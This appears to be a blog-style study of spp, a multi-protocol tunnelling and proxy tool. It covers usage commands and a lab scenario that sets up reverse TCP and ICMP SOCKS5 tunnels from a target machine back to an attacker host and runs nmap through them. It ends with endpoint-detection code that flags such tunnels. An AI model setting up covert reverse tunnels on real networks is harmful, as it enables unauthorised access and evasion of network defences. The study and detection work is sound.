foreword
This post studies spp, a tool that supports multi-protocol bidirectional proxies.
github: https://github.com/esrrhs/spp
I. Overview
1. Introduction
First released in 2020 and continuously updated, from Tencent, written in Go
- Supported protocols: tcp, udp, rudp (reliable udp), ricmp (reliable icmp), rhttp (reliable http), kcp, quic
- Supported types: forward proxy, reverse proxy, socks5 forward proxy, socks5 reverse proxy
- Combinations of protocols and types are supported
- Supports all platforms
2. Principle
3. Usage
(1) Server
Start the server, assuming the server address is www.server.com, listening on port 8888:
./spp -type server -proto tcp -listen :8888
You can also listen on several ports and protocols at the same time:
./spp -type server -proto tcp -listen :8888 -proto rudp -listen :9999 -proto ricmp -listen 0.0.0.0
You can also use docker
docker run --name my-server -d --restart=always --network host esrrhs/spp ./spp -proto tcp -listen :8888
(2) Client
Start the tcp forward proxy and map port 8080 of www.server.com to local port 8080, so that accessing local port 8080 is equivalent to accessing port 8080 of www.server.com:
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp
Start the tcp reverse proxy and map local port 8080 to port 8080 of www.server.com, so that accessing port 8080 of www.server.com is equivalent to accessing local port 8080:
./spp -name "test" -type reverse_proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp
Start the tcp forward socks5 proxy: a socks5 service is opened on local port 8080, and the network where the server is located is reached through the server:
./spp -name "test" -type socks5_client -server www.server.com:8888 -fromaddr :8080 -proxyproto tcp
Start the tcp reverse socks5 proxy: a socks5 service is opened on port 8080 of www.server.com, and the network where the client is located is reached through the client:
./spp -name "test" -type reverse_socks5_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp
For other proxy protocols, only the client's proxyproto parameter needs to change, for example:
# proxy udp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto udp
# proxy rudp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8081 -toaddr :8081 -proxyproto rudp
# proxy ricmp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8082 -toaddr :8082 -proxyproto ricmp
# proxy all three of the above at the same time
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto udp -fromaddr :8081 -toaddr :8081 -proxyproto rudp -fromaddr :8082 -toaddr :8082 -proxyproto ricmp
The internal communication between the client and the server can also be switched to another protocol; the external protocol and the internal protocol are converted automatically. For example:
# proxy tcp, forwarded internally over rudp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp -proto rudp
# proxy tcp, forwarded internally over ricmp
./spp -name "test" -type proxy_client -server www.server.com -fromaddr :8080 -toaddr :8080 -proxyproto tcp -proto ricmp
# proxy udp, forwarded internally over tcp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto udp -proto tcp
# proxy udp, forwarded internally over kcp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto udp -proto kcp
# proxy tcp, forwarded internally over quic
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp -proto quic
# proxy tcp, forwarded internally over rhttp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp -proto rhttp
You can also use docker
docker run --name my-client -d --restart=always --network host esrrhs/spp ./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp
II. Practice
1. Test scenario
Attacker (server): kali 192.168.10.128
Target (client): ubuntu 192.168.10.129
The target machine can ping the attacking machine
2. TCP reverse connection
(1) Server
Listen on port 8888 with the TCP protocol:
./spp -type server -proto tcp -listen :8888
(2) Client
Start the reverse proxy over TCP and map port 2222 of the server to port 80 of the client, so that the server accessing its own port 2222 is equivalent to accessing port 80 of the client:
./spp -name "test" -type reverse_proxy_client -server 192.168.10.128:8888 -fromaddr :2222 -toaddr :80 -proxyproto tcp
You can start Apache on port 80 to verify this.
(3) Tunnel establishment
The server accesses port 2222, which maps to port 80 on the client, and the Apache page opens.
(4) Take a look at the packets
Connection establishment: the port, user and password are returned
Port 80 traffic, encrypted
3. ICMP SOCKS5 proxy reverse connection
(1) Server
./spp -type server -proto ricmp -listen 0.0.0.0
(2) Client
./spp -name "test" -type reverse_socks5_client -server 192.168.10.128 -fromaddr :1080 -proxyproto tcp -proto ricmp
(3) Establish a tunnel
Configure proxychains, then run nmap through the proxy; it prints the following log:
(4) Take a look at the packets
Connection establishment: the port, user and password are returned
Heartbeat packets
nmap traffic through the tunnel
III. Explore
1. Source code and analysis
The author maintains a very large go-engine library behind spp, which can be studied in depth.
2. Detection and bypass
Because spp's feature set is so complete, detection should rely not only on the traffic characteristics of whichever mode is in use, but also, and perhaps more so, on endpoint behaviour.
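As an added example for the endpoint side of that point (not code from the original post or from the spp project), the following Python parses spp command lines of the shape documented in the Usage section above, as they would appear in a process listing, into server listeners or client mappings, and flags the reverse, socks5 and ricmp variants an analyst would want to look at first. The sample ps lines are constructed, and treating tcp as the default when -proto is absent is an assumption.

```python
import shlex

REVERSE_TYPES = {"reverse_proxy_client", "reverse_socks5_client"}

def parse_spp(cmdline):
    """Parse one spp command line (None if not spp); models only the flag grammar shown in this post."""
    argv = shlex.split(cmdline)
    idx = next((i for i, a in enumerate(argv) if a.rsplit("/", 1)[-1] == "spp"), None)
    if idx is None:
        return None
    args = argv[idx + 1:]
    pairs = [(args[i].lstrip("-"), args[i + 1]) for i in range(0, len(args) - 1, 2)]
    rec = {"type": None, "server": None, "proto": "tcp", "listeners": [], "mappings": []}  # tcp: assumed default
    cur = {}
    for k, v in pairs:
        if k in ("type", "server", "proto"):
            rec[k] = v                        # on a client the last -proto is the tunnel transport
        elif k == "listen":                   # server side: -proto X -listen Y pairs
            rec["listeners"].append((rec["proto"], v))
        elif k in ("fromaddr", "toaddr"):
            cur[k] = v
        elif k == "proxyproto":               # client side: closes one mapping (socks5 has no -toaddr)
            cur["proxyproto"] = v
            rec["mappings"].append(cur)
            cur = {}
    return rec

def triage(cmdline):
    """Findings an analyst would want first when this command line appears on an endpoint."""
    rec = parse_spp(cmdline)
    if rec is None:
        return []
    findings = []
    if rec["type"] in REVERSE_TYPES:
        findings.append("reverse connection to %s" % rec["server"])
    if rec["type"] and "socks5" in rec["type"]:
        findings.append("socks5 pivot")
    if rec["proto"] == "ricmp" or any(p == "ricmp" for p, _ in rec["listeners"]):
        findings.append("ricmp tunnel (no port; needs raw ICMP socket privilege)")
    return findings

# constructed process-listing lines, modelled on the commands in this post
SAMPLE_PS = [
    "root 1201 ./spp -name test -type reverse_socks5_client -server 192.168.10.128 -fromaddr :1080 -proxyproto tcp -proto ricmp",
    "www-data 1337 /usr/sbin/apache2 -k start",
    "root 1402 ./spp -type server -proto tcp -listen :8888 -proto rudp -listen :9999 -proto ricmp -listen 0.0.0.0",
]

def scan(lines):
    # map pid (second ps column) to findings, keeping only lines that produced any
    return {l.split()[1]: triage(l) for l in lines if triage(l)}
```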
Epilogue
spp has taken a big step on the road to a complete, unified tool for bringing targets online.